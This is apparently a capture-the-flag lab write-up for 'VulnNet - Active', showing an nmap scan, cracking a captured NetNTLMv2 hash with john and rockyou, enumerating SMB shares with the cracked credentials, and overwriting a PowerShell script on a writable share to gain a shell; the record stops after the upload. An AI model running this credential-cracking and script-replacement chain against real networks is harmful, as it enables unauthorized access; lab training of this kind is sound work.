Vulnnet - Active
LLMNR via Redis Server - Replacing .ps1 scripts for shell - SeImpersonate Privilege Escalation
Scanning
Starting off with a Nmap scan
# Nmap 7.94 scan initiated Tue Jun 27 19:51:35 2023 as: nmap -sCV -A -p 53,135,139,445,464,6479,9389,49666,49668,49669,49670,49677,49686 -T4 -vvv -oN nmap.log -Pn 10.10.209.190
Nmap scan report for 10.10.209.190
Host is up, received user-set (0.27s latency).
Scanned at 2023-06-27 19:51:35 IST for 104s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
6479/tcp open redis syn-ack
9389/tcp open mc-nmf syn-ack .NET Message Framing
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open msrpc syn-ack Microsoft Windows RPC
49686/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24676/tcp): CLEAN (Timeout)
| Check 2 (port 58166/tcp): CLEAN (Timeout)
| Check 3 (port 53820/udp): CLEAN (Timeout)
| Check 4 (port 45247/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2023-06-27T14:22:39
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 27 19:53:19 2023 -- 1 IP address (1 host up) scanned in 104.10 secondsEnumeration
cash@secure:~/active$ john hash --wordlist=/opt/rockyou.txt
Created directory: /home/cash/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sand_0873959498 (enterprise-security)
1g 0:00:00:02 DONE (2023-06-27 20:05) 0.4347g/s 1745Kp/s 1745Kc/s 1745KC/s sandoval69..sanat85
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.cash@secure:~/active$ crackmapexec smb 10.10.209.190 -u 'enterprise-security' -p 'sand_0873959498' --shares
SMB 10.10.209.190 445 VULNNET-BC3TCK1 [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)
SMB 10.10.209.190 445 VULNNET-BC3TCK1 [+] vulnnet.local\enterprise-security:sand_0873959498
SMB 10.10.209.190 445 VULNNET-BC3TCK1 [+] Enumerated shares
SMB 10.10.209.190 445 VULNNET-BC3TCK1 Share Permissions Remark
SMB 10.10.209.190 445 VULNNET-BC3TCK1 ----- ----------- ------
SMB 10.10.209.190 445 VULNNET-BC3TCK1 ADMIN$ Remote Admin
SMB 10.10.209.190 445 VULNNET-BC3TCK1 C$ Default share
SMB 10.10.209.190 445 VULNNET-BC3TCK1 Enterprise-Share READ
SMB 10.10.209.190 445 VULNNET-BC3TCK1 IPC$ READ Remote IPC
SMB 10.10.209.190 445 VULNNET-BC3TCK1 NETLOGON READ Logon server share
SMB 10.10.209.190 445 VULNNET-BC3TCK1 SYSVOL READ Logon server share cash@secure:~/active$ smbclient -U enterprise-security \\\\10.10.209.190\\Enterprise-Share
Password for [WORKGROUP\enterprise-security]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Feb 24 04:15:41 2021
.. D 0 Wed Feb 24 04:15:41 2021
PurgeIrrelevantData_1826.ps1 A 69 Wed Feb 24 06:03:18 2021
9558271 blocks of size 4096. 5159813 blocks available
smb: \> del PurgeIrrelevantData_1826.ps1
NT_STATUS_ACCESS_DENIED deleting remote file \PurgeIrrelevantData_1826.ps1
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (3.3 kb/s) (average 3.3 kb/s)
smb: \> ls
. D 0 Wed Feb 24 04:15:41 2021
.. D 0 Wed Feb 24 04:15:41 2021
PurgeIrrelevantData_1826.ps1 A 4402 Tue Jun 27 20:14:36 2023
9558271 blocks of size 4096. 5159755 blocks availableLast updated